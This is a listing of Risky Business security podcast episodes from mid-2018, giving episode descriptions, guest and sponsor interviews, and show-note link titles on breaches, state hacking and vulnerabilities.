Show notes InsightVM Free Trial: Top Ranked Vulnerability Scanner | Rapid7 Learn technology and pass IT certifications with ITProTV

Risky Business feature interview: Bob Lord, CSO, Democratic National Committee

Aug 24, 2018


In this podcast you’ll hear an interview I did with Bob Lord, the Chief Security Officer for the Democratic National Committee, the DNC. Bob has previously served as the CISOs for both Yahoo and Twitter, before spending some time in vendorland with Rapid7 as their CISO in residence.

The state-sponsored attack against the DNC is without doubt the most politically consequential data theft event the planet has ever witnessed. It trumped both the Manning/Wikileaks disclosures and “climategate” in terms of impact, and indeed to a large degree the fallout of the DNC hack is still ongoing.

So, I wanted to bring Bob in to talk about his job.

The DNC isn’t a large organisation, in a head office sense. They have about 200 core staff members, but as you’ll hear, a political organisation’s IT setup is pretty atypical. So Bob and I mostly just spoke about how one handles security for an organisation like the DNC.

Risky Business #510 -- Hacky hack hack

Aug 22, 2018


On this week’s show we’ll be running through the week’s security news, then diving right on in to a sponsor interview with Lauren Pearl of Trail of Bits. She’s joining us to talk about something Trail of Bits have been up to lately: adding features to open source software – and auditing open source software – on behalf of its customers.

I do have a feature interview this week, but it’s a long one so I’ll be breaking that out in to a separate podcast. It’s a nice long chat with Bob Lord, the CSO for the Democratic National Committee. You know, the guy who hid “the server”.

The news we’re covering this week:

Melbourne teenager hacky-hack hacks Apple Facebook nukes Iranian and RU influence ops Report: Sealed court order seeks Facebook Messenger E2E intercept USG ditches PPD-20 equities process A look at “Intrusion Truth” CN operator doxing ring Microsoft kills RU phishing domains PLUS MOAR

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Melbourne teen hacked into Apple's secure computer network, court told Apple reassures customers after Australian media reports hack by teen Taking Down More Coordinated Inauthentic Behavior | Facebook Newsroom Suspected Iranian Influence Operation Leverages Network of Inauthentic News Sites & Social Media Targeting Audiences in U.S., UK, Latin America, Middle East « Suspected Iranian Influence Operation Leverages Network of Inauthentic News Sites & Social Media Targeting Audiences in U.S., UK, Latin America, Middle East | FireEye Inc Exclusive: U.S. government seeks Facebook help to wiretap Messenger - sources | Reuters PPD-20 elimination opens arguments over how U.S. should conduct offensive hacking operations Bobby Chesney on Twitter: "Glad the dual-hat seems likely to hang on for at least a while. With no brakes at NSC, & now change to PPD-20 reducing interagency vetting of offensive mil cyber ops, the deconfliction of T10 & T50 equities that happens organically w/the NSA/CYBERCOM dual-hat looms even larger.…" China's National Cybersecurity Standards Considered a Risk for Foreign Firms Meet 'Intrusion Truth,' the Mysterious Group Doxing Chinese Intel Hackers - Motherboard Microsoft Just Took Down Six Phishing Domains The Russian Government Was Using To Target US Politics Google Sued Over Misleading Location Tracking Setting Gmail's Confidential Mode Lets You Send Self-Destructing Emails Skype's End-to-End Encryption Goes Live Hackers Made Half a Million Dollars Pretending They Watched You Watch Porn - Motherboard Apple Cleans Chinese App Store of Thousands of Fake Apps GoDaddy Revocation Disclosure - Google Groups JavaScript Web Apps and Servers Vulnerable to ReDoS Attacks GitHub - sola-da/ReDoS-vulnerabilities: A list of ReDoS vulnerabilities in npm modules found by the Software Lab at TU Darmstadt. For each vulnerability, there is a proof-of-concept exploit, showing how the slowdown may occur. The resources in this repository are provided for research purpose only. Please read below for more details. Cloud Product Accidentally Exposes Users' TLS Certificate Private Keys Zero-Day In Microsoft's VBScript Engine Used By Darkhotel APT PHP Deserialization Issue Left Unfixed in WordPress CMS Get an open-source security multiplier | Trail of Bits Blog

Risky Business feature: Adam Boileau recaps Black Hat and DEF CON

Aug 20, 2018


In this breakout podcast we chat with Adam Boileau about the talks that caught his attention in Las Vegas a couple of weeks ago. The Black Hat PR team were kind enough to credential Adam for the con so he could go and see a few talks with his Risky Business hat on.

I was at Black Hat but spent most of my time running around like a headless chicken. These days Vegas week for me is mostly about locking in the next year’s sponsorships, as well as catching up with friends I hardly ever see. The good news is the sponsorship side is done. We’re almost sold out across the weekly show, Snake Oilers and Soap Box until 2020. The bad news is I didn’t really get to go to any talks.

But that’s ok, because Adam went to both Black Hat and DEF CON and he joined me to talk about the highlights from his point of view. This was his first trip to the Vegas cons since 2005, and agreed with me that the content this year was actually pretty bloody good.

I’ve done my best to assemble links to everything Adam talks about into a list below:

Show notes Practical Web Cache Poisoning | Blog From Workstation to Domain Admin -- Why Secure Administration Isn't Secure us-18-Shaik-LTE-Network-Automation-Under-Threat-wp.pdf Black Hat: Understanding TRITON, The First SIS Cyber Attack TRITON Analysis Tools airgap | Advanced Cyber-Security Research Lab Screaming Channels: When Electromagnetic Side Channels Meet Radio Transceivers Black Hat USA 2018 | Briefings DCShadow attack DEF CON® 26 Hacking Conference Speakers GitHub - sensepost/mana: Our mana toolkit for wifi rogue AP attacks and MitM - see hostapd-mana too GitHub - quickbreach/SMBetray: SMB MiTM tool with a focus on attacking clients through file content swapping, lnk swapping, as well as compromising any data passed over the wire in cleartext.

Risky Business #509 -- Just the usual mayhem and ownage

Aug 16, 2018


Adam and I have just returned from Black Hat and DEF CON in Las Vegas, so in this week’s show we’re going to have a look at the infosec news we missed over last couple of weeks. We did plan to recap Black Hat in this podcast, but we’ve wound up a bit short on space so I’m busting that out into a separate podcast that I’ll publish on Monday. So this podcast will just be a discussion around news plus a sponsor interview.

The news we’re covering:

Australia’s new surveillance/”anti-encryption” laws Intel SGX vulnerability research Taiwan Semiconductor WannaCry woes Details on CYBERCOM op against ISIS Reddit pwnage Bitcoin investor sues AT&T over $23m loss FIN7 arrests CIA’s loss of scores of China assets may have been hack-related Massive ATM cashout and SWIFT attack hits Indian bank Much, much more

Bugcrowd CTO Casey Ellis joins us in this week’s sponsor interview to talk about a few things – firstly, how some research presented at Black Hat by the team at Portswigger is a sign that serious research teams are using bounties to cash in on their serious security research. Then we’ll be talking about the Bugcrowd University initiative and a reboot of the project.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Apple and Facebook pressured to reveal terror suspects' data 'Foreshadow' Flaw Undermines the Intel CPU Secure Enclave | WIRED Key iPhone supplier is hamstrung with the debilitating WannaCry worm | Ars Technica How US Military Hackers Prepared to Hack the Islamic State - Motherboard Password breach teaches Reddit that, yes, phone-based 2FA is that bad | Ars Technica Bitcoin Investor Sues AT&T After Losing $23 Million In SIM Swap Hack - Motherboard Fin7: The Inner Workings of a Billion-Dollar Hacking Group | WIRED Former Microsoft engineer sentenced for role in ransomware scheme Botched CIA Communications System Helped Blow Cover of Chinese Agents – Foreign Policy In-vehicle wireless devices are endangering emergency first responders | Ars Technica Hackers Steal $13.5 Million Across Three Days From Indian Bank DNC tells candidates not to use Huawei or ZTE devices Report: 'Faxploit' hack can penetrate networks with just a fax number Popular Android Apps Vulnerable to Man-in-the-Disk Attacks New Method Simplifies Cracking WPA/WPA2 Passwords on 802.11 Networks U.S. Payment Processing Services Targeted by BGP Hijacking Attacks Hacked Water Heaters Could Trigger Mass Blackouts Someday | WIRED Malware has no trouble hiding and bypassing macOS user warnings | Ars Technica Powerful Smartphone Malware Used to Target Amnesty International Researcher - Motherboard In-the-wild router exploit sends unwitting users to fake banking site | Ars Technica This Guy Hacked Hundreds Of Planes From The Ground Cisco to acquire Duo Security for $2.35 billion Practical Web Cache Poisoning | Blog · So our hacker friends don’t go to jail. Bugcrowd University – Bugcrowd

Risky Business #508 -- Special guest Greg Shipley of In-Q-Tel's Cyber Reboot

Jul 31, 2018


On this week’s show we hear from Greg Shipley. Greg works at an initiative spun up by In-Q-Tel called Cyber Reboot. Its goal is to develop open source tools that can push things forward in security – things the private sector aren’t doing.

He’ll be telling us about some changes his colleagues have made to tcpdump, which, if they ever manage to get the changes adopted, could actually be quite useful to the security community.

This week’s show is brought to you by Duo Security! And Duo’s very own Dave Lewis will be joining us this week to talk about the roadblocks you might face if you’re trying to head down the BeyondCorp road to the deperimiterised nirvana!

Adam Boileau drops in to discuss the week’s news, including:

COSCO shipping ransomwared into oblivion DHS warning on impending ERP attacks Charges against SIM-swap cryptocurrency thief Google’s “Shielded VMs” Google’s launch of its own hardware security tokens Master134 malvertising campaign New Kronos version NetSpectre attacks Bluetooth bugs Much, much more

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Shipping company’s networks in the Americas crippled by ransomware attack | Ars Technica US government's "do not buy" list shuts out Russia, China | ZDNet Fighting Chinese cyber-espionage could cost U.S. 5G dominance WikiLeaked: Over 11,000 messages from private WikiLeaks chat released – Emma Best Russian Hackers’ New Target: a Vulnerable Democratic Senator Facebook Suspends Alex Jones’ Profile - Motherboard DHS Warns of Impending Cyber-Attacks on ERP Systems Hackers find creative way to steal $7.7 million without being detected | Ars Technica ‘TELL YOUR DAD TO GIVE US BITCOIN:’ How a Hacker Allegedly Stole Millions by Hijacking Phone Numbers - Motherboard Google launches “Shielded VMs” to protect cloud servers from rootkits, data theft | Ars Technica Security keys have been good to Google, so now it's promoting one of its own Massive Malvertising Campaign Discovered Attempting 40,000 Infections per Week Symantec Discovers New and Inexperienced Iranian APT New Version of the Kronos Banking Trojan Discovered New Spectre attack can remotely steal secrets, researchers say | ZDNet Decade-old Bluetooth flaw lets hackers steal data passing between devices | Ars Technica Idaho Inmates Hacked Prison Service for $225,000 in Credit - The New York Times Senrio Reimagining Cyber Defense – CyberReboot – Reimagining Cyber Defense Home: BroCon 2018 The Trusted Access Company | Duo Security

Risky Biz Soap Box: Zane Lackey of Signal Sciences talks DevOps

Jul 30, 2018


What you’re about to hear is a long form interview with Zane Lackey, a former pentester turned director of security engineering for Etsy turned co-founder and CSO of Signal Sciences.

Signal Sciences can be broadly, kinda described as “next generation WAF”. If you do have a requirement for a waffy, raspy thing, then you absolutely need to check out Signal Sciences.

They give you visibility in to attacks against your applications, and even auto-blocking a bunch of them without that turning into a cascading horror-show.

Signal Sciences’ product has a really strong emphasis on assisting organisations who are running DevOps shops. And it makes sense, Zane’s key achievement at Etsy was managing the security of that company’s Devops transition.

He’s actually just written an O’Reilly book, Building a Modern Security Program. So, he joined me to talk about his book, what’s in it, about DevSecOps more generally, and about some new stuff Signal Sciences has been working on.

Risky Business #507 -- For Vlad

Jul 25, 2018


We didn’t have space to run a feature in this week’s show, mostly because we had three weeks of news to catch up on because of my holiday. Adam Boileau is away on a company retreat this week, so Haroon Meer is this week’s news guest.

We talk about:

The Russia indictment Chrome now marks http sites as “not secure” Julian Assange is close to being turfed out of his London digs Microsoft’s midterm meddling misfire Singapore loses 1.5m health records Some cool research from Talos and Cyberark Azimuth Security acquired by L3 The npm supply-chain attack Chrome site isolation And much more!

This week’s sponsor is ICEBRG. And ICEBRG just announced today that it’s been acquired by Gigamon, which is pretty big news for them. So we’ll spend a couple of minutes talking about that with ICEBRG’s Jason Rebholz. Then we’ll be talking to Justin Warner about a pretty cool Flash 0day they found hiding in a Microsoft Office document. That was some pretty cool work, and the attackers in that case did some pretty novel things in terms of keeping their payload away from prying eyes. Obviously they didn’t do a good enough job or we wouldn’t be talking about it, but there are some new techniques there, fun stuff.

*****NOTE: At one point I get Jason Rebholz’s name wrong. I call him Justin Rebholz by accident. Apologies for the error, Jason!

Show notes Today’s the day that Chrome brands plain old HTTP “not secure” | Ars Technica 12 Russian Spies Indicted for Hacking in 2016 | Fortune The Russians Who Allegedly Hacked the DNC Sexted a Playboy Model and 'Bond Girl' - Motherboard Russian hackers struck Clinton server hours after Trump called for emails - CyberScoop Trump calls Putin's plan for investigating 2016 DNC breach an 'incredible offer' - Cyberscoop Ecuador 'close to evicting' Julian Assange from UK embassy | The Independent Microsoft: Russian Hackers Are Targeting The Midterms Three top cybersecurity officials are leaving the FBI: Report Singapore personal data hack hits 1.5m, health authority says - BBC News Cisco's Talos Intelligence Group Blog: Advanced Mobile Malware Campaign in India uses Malicious MDM Cellebrite's newest target: Your IoT-filled home Alexa, Are You A Spy? Israeli Startup Raises $12.5 Million So Governments Can Hack IoT L3 Strengthens Intelligence Collection and Surveillance Capabilities With Cyber Acquisitions | Business Wire In the opaque world of government hacking, private firms grapple with allegiances King iPhone Hacker NSO Group Robbed By Employee -- Spyware On Dark Web Sale For $50 Million, Israel Claims Private sector played critical role in WannaCry attribution, ODNI official says Compromised JavaScript Package Caught Stealing npm Credentials Google Chrome shifts browser architecture to thwart Spectre attacks Lawmakers call on Amazon and Google to reconsider ban on domain fronting DOJ regrets the error on OPM-linked fraud case A Privacy Researcher Uncovered a Year’s Worth of Breakups and Drug Deals Using Venmo’s Public Data - Motherboard Avoid Detection with Shadow Keys - CyberArk Attacks on Oracle WebLogic Servers Detected After Publication of PoC Code Watch a Hacker Install a Firmware Backdoor on a Laptop in Less Than 5 Minutes - Motherboard Many Bluetooth Implementations and OS Drivers Affected by Crypto Bug ICEBRG, Inc. Risky Biz Annual Black Hat Party w/ Signal Sciences, Remediant and Bugcrowd Tickets, Tue, Aug 7, 2018 at 7:00 PM | Eventbrite

Risky Biz Soap Box: Cylance: Driving machine learning model development with threat research

Jul 18, 2018


There’s no weekly show this week, I’m on a beach somewhere tropical right now and I prepared this one so we’d have something to run while I’m away. The Soap Box is one of our wholly sponsored podcasts here at Risky Biz HQ – vendors pay to come on to talk about what’s on their mind.

And this week we’ve got Cylance’s very own Chris Sestito joining us. He heads threat research for Cylance, the AV company.

Cylance is a relatively new company – they’ve been around about six years now – and regular listeners would have heard me credit them for almost singlehandedly shaking up the AV industry.

They built a machine learning model for detecting malware that was effective enough to actually challenge the incumbents, who until then, had a stranglehold on the market. Cylance’s fortunes rose further when it played an instrumental part in detecting and cleaning up malware used against the US office of personnel management, or OPM.

That was a big moment, because from there it seemed like all of a sudden EVERYONE was a machine learning company. I’m sure a lot of people listening to this podcast are so sick to death of hearing pitches from vendors about machine learning.

But the thing is, Cylance was built on machine learning and they are still 100%, 24-carat true believers. Chris Sestito joined me to talk about driving machine learning model development with threat research, dodgy machine learning marketing and more.

Snake Oilers 6 part 2: Proofpoint on cred phishing, Exabeam defines next-gen SIEM

Jul 5, 2018


Snake Oilers is a wholly sponsored podcast series we a few times a year here at Risky Biz HQ. The idea is we get a bunch of vendors together and they pitch their tech in a straightforward way. Less “stops advanced cyber threats” and more “here’s what our stuff does and how it works”.

You’re hearing this instead of a weekly show because I am currently on a beach somewhere tropical.

We’ve got two vendors in this edition of ‘Oilers: next-gen SIEM platform company Exabeam and email filtering giant Proofpoint.

Our sponsor guest from Proofpoint is Ryan Kalember. Ryan is the SVP of cybersecurity strategy at Proofpoint, and regular listeners would have heard him pop up here and there on other Risky Business podcasts.

Ryan knows an awful lot about email security and he’s joining us this week to talk about a few things. A big selling point he wants to hit home this week is that Proofpoint offers its clients dedicated IPs for their outbound mail servers. That means you won’t be blocked when someone else using the same IP for outbound mail starts sending spam. Believe it or not this is a thing that happens to users on other mail filtering platforms. From there Ryan spells out Proofpoint’s approach to combating credential phishing. Aaaaand we talk about other stuff too. We started off by talking about how some organisations are getting blocked because their filtering provider is sharing IPs between clients.

Exabeam also drops in to talk about what a next gen SIEM actually is. From day one Exabeam was a startup that meant business. As you’ll hear, they started off as a SIEM-helper, and they’ve gradually built out their product from there. Now they’re going after the established SIEM market – think Splunk, Arcsight, those types of products. Despite only being five years old, Exabeam has quickly established itself as a real player in the SIEM market.

And why not? They make a compelling argument that the most popular SIEM products have gone stale. Anu Yamanan is the VP of products at Exabeam and she’s here to explain the general pitch behind all next generation SIEM gear. The idea is to go beyond the event log and build a timeline of events that actually has context around it. SOC analysts, SIEM specialists and CSOs will be interested to hear what she has to say here.

Show notes Leader in Advanced Cybersecurity Solutions | Proofpoint Exabeam - The Market Leader in Next Gen SIEM Solutions

Risky Business #506 -- How security teams can work with PR

Jul 4, 2018


On this week’s show we’re chatting with a PR pro who specialises in information security. Melanie Ensign currently works at Uber, but she also served as a security PR for Facebook and before that, AT&T. She drops in this week to talk about how you can work with the PR professionals in your organisation to help tell your security story to the wider world. She also has some great tips for infosec professionals who might be a bit nervous about dealing with journalists.

In this week’s sponsor interview we’re joined by Julian Fay, the CTO of Senetas.

Senetas has a long history of making layer 2 network encryptors, but they are branching out in all sorts of ways these days. One thing they’re doing now is working on approaches to network encryption that play nicely with software-defined WAN. The days of hauling all your network traffic back to a single choke point are numbered – Julian thinks in the near future you’ll have some sort of CPE device that actually implements different types of encryption on different types of traffic crossing your border. So, Senetas has actually built that gear and we’ll be hearing about why.

Adam Boileau joins the show to talk about the week’s security news:

Some very cool LTE research Equifax manager charged with insider trading Ticketmaster’s bad week The US DoD’s very own app store Weird, maybe, possibly-but-probably-not OPM-related fraud MOAR Rowhammer stuff affecting ‘droid handsets

Links to everything are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes LTE wireless connections used by billions aren’t as secure as we thought | Ars Technica | Former Equifax Manager Charged With Insider Trading Trump calls out NSA for deleting data: Here are the facts - CBS News Startup bank Monzo: We warned Ticketmaster months ago of site fraud • The Register Ticketmaster UK trades blame with chat app provider over payment data breach Bill would call on White House to develop its own list of APT groups Private sector isn’t sharing data with DHS’s threat portal U.S. poised to deny China Mobile access to American market due to spying fears How the Pentagon Keeps Its App Store Secure | WIRED Lawmakers demand answers in wake of strange OPM identity fraud lawsuit DNC pushes employees, campaigns to embrace email security habits ahead of midterms Feds Pose as Cryptocurrency Money Launderer to Bust Alleged Dark Web Dealers - Motherboard Cryptocurrency Transactions May Uncover Sales of Shadow Broker Hacking Tools - Motherboard DNS Poisoning or BGP Hijacking Suspected Behind Trezor Wallet Phishing Incident Brave browser adds private tabs with Tor for 'enhanced privacy protection' Rash of Fortnite cheaters infected by malware that breaks HTTPS encryption | Ars Technica New RAMpage exploit revives Rowhammer attack to root Android devices | Ars Technica adidas - adidas alerts certain consumers of potential data security incident Marketing Firm Exactis Leaked a Personal Info Database With 340 Million Records | WIRED Sadly, Ross Ulbricht's Case Will Not Be Heard by the Supreme Court - Hit & Run : Two Zero-Day Exploits Found After Someone Uploaded 'Unarmed' PoC to VirusTotal Gentoo GitHub organization hacked - partially resolved - Gentoo infrastructure status Samsung Investigates Claims of Spontaneous Texting of Images to Contacts | The first stop for security news | Threatpost Senetas - a leading provider of high-assurance encryption Risky Biz Annual Black Hat Party w/ Signal Sciences, Remediant and Bugcrowd Tickets, Tue, Aug 7, 2018 at 7:00 PM | Eventbrite

Risky Business #505 -- Sanger vs FireEye, Reality Winner cops a plea

Jun 27, 2018


No feature interview in this week’s show, we go long on news instead. Adam Boileau joins the podcast to talk through the week’s infosec news, including:

Confusion reigns in David Sanger vs FireEye spat Reality Winner pleads guilty PEXA property settlement platform users fleeced US Supreme Court decides location info requires a warrant The Apple unlock bug that wasn’t

This week’s show is brought to you by Thinkst Canary. Thinkst’s very own Marco Slaviero joins us in this week’s sponsor segment to talk about how some vendors are derping out when it comes to creating needlessly complicated “deception platforms”.

Links to everything are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes FireEye denies 'hack back' claims detailed in new book Kim Zetter on Twitter: "I wonder if Congress will hold a hearing to discuss the issue of a private US company taking on the role of the NSA to hack foreign military computers. This raises a lot of issues about potential national security blowback when a private company inserts itself in state matters." Kim Zetter on Twitter: "Sanger's description of what he says Mandiant did vs. what Mandiant says it did. Sanger implies he saw videos of Chinese hackers wearing leather jackets and undershirts - that's not in video Mandiant published. Are there other videos? Did Sanger misinterpret? So many questions." Former NSA contractor Reality Winner accepts guilty plea for leaking classified report Supreme Court: Police Need Warrant for Mobile Location Data — Krebs on Security Bail Bond Company Let Bounty Hunters Track Verizon, T-Mobile, Sprint, and AT&T Phones for $7.50 - Motherboard PEXA account compromise sees family lose home sale funds - Security - iTnews MasterChef: Dani Venn homeless after hackers steal $250K Microsoft Forcing Multi-Factor Authentication on Azure AD Admin Accounts Police officer guilty of assault, perverting the course of justice Apple corrects the record on reported iPhone vulnerability Cops May Unlock iPhones Without a Warrant to Beat Apple's New Security Feature - Motherboard Firefox is adding 'Have I Been Pwned' alerts VirusTotal launches Monitor tool to fight false positives - CyberScoop New WPA3 Wi-Fi Standard Released Lawmakers urge Google to end partnership with China's Huawei ‘Tick’ espionage group is likely trying to hop air gaps, researchers say Bithumb, South Korea's largest cryptocurrency exchange, loses $30 million to hackers Unpatched Flaw Disclosed in WordPress CMS Core I discovered a browser bug - Project Zero: Detecting Kernel Memory Disclosure – Whitepaper The $5 Million Surveillance Car That Hacks iPhones From 500 Meters Canary — know when it matters

Snake Oilers 6 part 1: InsightIDR from Rapid7, whitelisting with Airlock Digital and testing your SOC personnel with AttackIQ

Jun 21, 2018


First up in this edition of Snake Oilers we speak with Rapid7. Listeners of the regular show would have heard me talk about their UserInsight software for years. That’s because I knew people who used it and they swore by it. UserInsight was user and entity behaviour analytics (UEBA) software that was massively ahead of its time. It was very good at spotting weird things happening on your network when it comes to dumped or compromised creds popping up in weird places.

Well, InsightIDR is basically where UserInsight wound up, and yeah, it’s morphed in to a product that’s half SIEM and half EDR.

Every Tom, Dick and Harriett seems to be offering EDR software these days, and every next-gen SIEM company is becoming more and more UEBA-centric, so what Rapid7 has created here is something in between. InsightIDR product manager Eric Sun will tell us all about it.

Next up we’ll hear the simplest pitch in this podcast, from Airlock Digital. They’re an Australian company that makes whitelisting software that’s actually useable. If your organisation has tried implementing whitelisting through Microsoft’s Applocker then you know how badly it sucks. These guys have created a simple but useable whitelisting solution.

I’ve been to the booth! I’ve seen the demo! Airlock Digital co-founder David Cottingham is our guest on their behalf. In addition to being a founder, David is also the author of the SANS course SEC480: which covers the ASD top 4 – number one on that list is whitelisting. He has experience in the federal government implementing whitelisting and after seeing just how badly other products suck, he and his mates founded Airlock Digital. So yeah, if you’re whitelist-curious or if you’re sick of dealing with Applocker, then you really, really should stick around for that one.

After that we’re checking in with Stephan Chenette of AttackIQ. They make attack simulation software, but in response to customer demand they’ve actually taken it to its logical extension - they’re now offering modules you can use to test your SOC staff, or, if you outsource, you can use these modules to test your MSSP. Throw some alerts at them and see what comes back – get scores for individual SOC operators. Hey, even if you ARE an MSSP you might want to use this software to see who to promote in your SOC. That’s interesting stuff.

Show notes nsightIDR Free Trial: The SIEM You've Always Wanted | Rapid7 Airlock Digital - Application Whitelisting Software Cyber Hunt

Risky Business #504 -- Latest email frauds and changes to money muling

Jun 20, 2018


On this week’s show we’re chatting with Alex Tilley. He’s with Secureworks in Australia these days, but before that he spent a big chunk of his career with the Australian Federal Police.

He did a presentation a few weeks back at the AusCERT conference all about what fraud crews are up to these days. He’ll be joining us to walk through how much damage West African crime groups are doing with compromised office 365 accounts. We also talk a bit about trends in money muling, because that game has really changed.

This week’s show is brought to you by Cylance, and in this week’s sponsor interview we’ll be chatting with Cylance’s very own Jim Walter about how ransomware hasn’t really gone anywhere, despite most of the tech press getting sick of writing about it.

Adam Boileau, as usual, joins us to talk about the week’s news, including:

The Vault7 guy is totally screwed US Senate scuttles Trump’s plan to save ZTE Chinese pwning satellite comms, telcos Olympic Destroyer crew is back

Links to everything are below and you can follow Patrick and Adam on Twitter if that’s your thing.

Show notes Ex-CIA employee charged in major leak of agency hacking tools - The Washington Post Ryan Duff on Twitter: "The CIA leaker conducted a privilege escalation on the computer he used to access the data he stole, erased all the logs of his activity, and then locked other users out. A lot more tradecraft here than your average leaker…" WikiLeaks Shares Alleged Diaries of Accused CIA Leaker Joshua Schulte - Motherboard Senate rejects Trump’s plan to lift ZTE export ban | Ars Technica China-based campaign breached satellite, defense companies: Symantec | Reuters Senate bill hopes to sort out supply-chain cybersecurity risks, prevent next Kaspersky drama Kaspersky Halts Europol and NoMoreRansom Project Coop After EU Parliament Vote North Korea to blame for string of Latin America bank hacks, insiders say After Trump courts Kim, U.S. issues warning on North Korean malware The Olympic Destroyer Hackers May Have Returned For More | WIRED Patrick Gray on Twitter: "And there it is. The circle is complete. The whole point of Olympic Destroyer was to cast doubt on attribution generally, even though nobody who matters ever made attribution claims based on a few “vectors”.…" Yubico snatched my login token vulnerability to claim a $5k Google bug bounty, says bloke • The Register Iran’s Telegram Ban Has Impacted All Corners of the Country | WIRED FBI recovers WhatsApp, Signal data stored on Michael Cohen’s BlackBerry | Ars Technica Reminder: macOS still leaks secrets stored on encrypted drives | Ars Technica Verizon and AT&T will stop selling your phone’s location to data brokers | Ars Technica Google to Fix Location Data Leak in Google Home, Chromecast — Krebs on Security 17 Backdoored Docker Images Removed From Docker Hub Cortana Hack Lets You Change Passwords on Locked PCs ZeroFont Technique Lets Phishing Emails Bypass Office 365 Security Filters Hacker Breaches Syscoin GitHub Account and Poisons Official Client Clipboard Hijacker Targeting Bitcoin & Ethereum Users Infects Over 300,0000 PCs Chris Vickery on Twitter: "Holy shit. This guy, George Cottrell, was advertising money laundering services on the dark web. He was caught red-handed in a FBI sting. Guy is (was) top aide to the Brexit campaign leader, Nigel Farage. His super secret dark web username was "Banker"." InstaCyber on Twitter: "It begins. THANKS #GDPR" Bitcoin’s Price Was Artificially Inflated, Fueling Skyrocketing Value, Researchers Say - The New York Times Man Gets 20 Years In Jail For Trying To Steal A Domain Name At Gunpoint | Gizmodo Australia Cops Are Confident iPhone Hackers Have Found a Workaround to Apple’s New Security Feature - Motherboard cylance spear team - Google Search

Risky Business #503 -- North Korean tech in the global supply chain

Jun 13, 2018


You might have noticed North Korea’s been in the news over the last couple of days. Well, we’re sticking with the theme – we’ve got a great feature interview for you this week with Andrea Berger. She’s a senior research associate at the US-based James Martin Centre for Nonproliferation Studies and the co-host of the Arms Control Wonk podcast. This week she speaks with Risky Business contributor Hilary Louise about a report the centre did into North Korea’s IT industry.

Yep, they have one, and you’ll be surprised by its scope and reach. That’s this week’s feature interview.

This week’s sponsor interview is with Signal Sciences co-founder and CEO Andrew Peterson. Andrew was at a Gartner event in DC last week, and I grabbed some time with him to talk about what’s new in DevSecOps, how people are applying various DevSecOps tools, and what the general awareness of good DevSecOps practices is out there. Andrew’s prior career was in development, not security. He and Zane Lackey worked together at Etsy and Signal Sciences was very much inspired by the work they both did there. Andrew says analysts are starting to understand that web application security isn’t something you drop on to a network in an appliance and things are actually changing.

Mark “Pipes” Piper is this week’s news guest. All the show links are below and you can follow Patrick, Pipes or Hilary, if that floats your boat.

Show notes Founder of Cybersecurity Company Says His Firm Was Sanctioned Because He was Born in Russia - Motherboard Treasury Sanctions Russian Federal Security Service Enablers | U.S. Department of the Treasury Republican senators move to block Trump’s deal to revive ZTE | Ars Technica WannaCry Hero Marcus Hutchins' New Legal Woes Spell Trouble for White Hat Hackers | WIRED Cisco's Talos Intelligence Group Blog: VPNFilter Update - VPNFilter exploits endpoints, targets new devices Top U.S. counterintelligence official: Kaspersky's move to Switzerland doesn't matter Chinese hackers stole sensitive U.S. Navy submarine plans from contractor China ramps up hacking of U.S. high-tech companies | McClatchy Washington Bureau Flash zero-day shows up in Qatar amid geopolitical struggles NDAA pushes U.S. Cyber Command to be more aggressive Senator hopes to draw red line discouraging election cyberattacks Congress wants to prevent states from weakening encryption FBI announces arrest of 74 email fraudsters on three continents For almost 11 years, hackers could easily bypass 3rd-party macOS signature checks | Ars Technica I can be Apple, and so can you | Okta This app in Google Play wants to use phone mics to enforce copyrights | Ars Technica In a blow to e-voting critics, Brazil suspends use of all paper ballots | Ars Technica Some Signal Disappearing Messages Are Not Disappearing - Motherboard US Government Probes Airplane Vulnerabilities, Says Airline Hack Is ‘Only a Matter of Time’ - Motherboard Hackers Crashed a Bank’s Computers While Attempting a SWIFT Hack Apple just banned cryptocurrency mining on iOS devices | Ars Technica Ethereum "Giveaway" Scammers Have Tricked People Out of $4.3 Million Around 5% of All Monero Currently in Circulation Has Been Mined Using Malware Trik Spam Botnet Leaks 43 Million Email Addresses DPRK's Shadow Sector report

Risky Business #502 -- Inside China's hacker scene

Jun 6, 2018


On this week’s show we chat with Peter Wesley. Peter’s well known around the Australian security scene, but a few years back he relocated to China, where security is booming. He did a presentation at the AusCERT conference on the Gold Coast last week all about the Chinese hacker scene and security industry. He joins us in this week’s feature interview to tell us about how the Chinese scene evolved and what its current relationship with the Chinese government looks like.

This week’s sponsor interview is a cracker. We’ll be joined by Ryan Kalember, Senior Vice President of Strategy with Proofpoint, the email filtering company. Ryan is along to talk about a phenomenon the Proofpointers are very interested in – we’ve all heard of VIPs, but he’s here to talk about VAPs – Very Attacked People.

So much attacker behaviour these days is driven by email-based attacks, and the people getting hit the most with this sort of stuff might not be the ones you expect. Ryan joins us later on for that conversation in this week’s sponsor interview, with thanks to Proofpoint.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes What Will Microsoft's GitHub Buy Mean For Controversial Code? | WIRED A host of new security enhancements is coming to iOS and macOS | Ars Technica Apple Is Testing a Feature That Could Kill Police iPhone Unlockers - Motherboard Microsoft Adds Post-Quantum Cryptography to an OpenVPN Fork Oracle WebLogic RCE Deserialization Vulnerability (CVE-2018-2628) - DZone Security Data from 92 million accounts stolen from DNA testing site MyHeritage Hacker Defaces Ticketfly’s Website, Steals Customer Database - Motherboard SS7 routing-protocol breach of US cellular carrier exposed customer data | Ars Technica Judge dismisses Kaspersky lawsuits, U.S. government ban will stand Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries' Former DIA official allegedly sold secrets to China, including possible Cyber Command information ICANN Launches GDPR Lawsuit to Clarify the Future of WHOIS | Threatpost | The first stop for security news With possible summit approaching, North Korean espionage hacks continue | Ars Technica Synack offers free penetration testing for election systems ahead of 2018 midterms CrowdStrike announces $1 million warranty for breaches that happen under its watch IE Zero-Day Adopted by RIG Exploit Kit After Publication of PoC Code CVE-2018-8174 | Windows VBScript Engine Remote Code Execution Vulnerability Chrome and Firefox leaks let sites steal visitors’ Facebook names, profile pics | Ars Technica Zip Slip Vulnerability Affects Thousands of Projects Across Multiple Ecosystems Malicious Git Repository Can Lead to Code Execution on Remote Systems The NSA Just Released 136 Historical Propaganda Posters - Motherboard NSA Security Posters 1950s-1970s - Album on Imgur

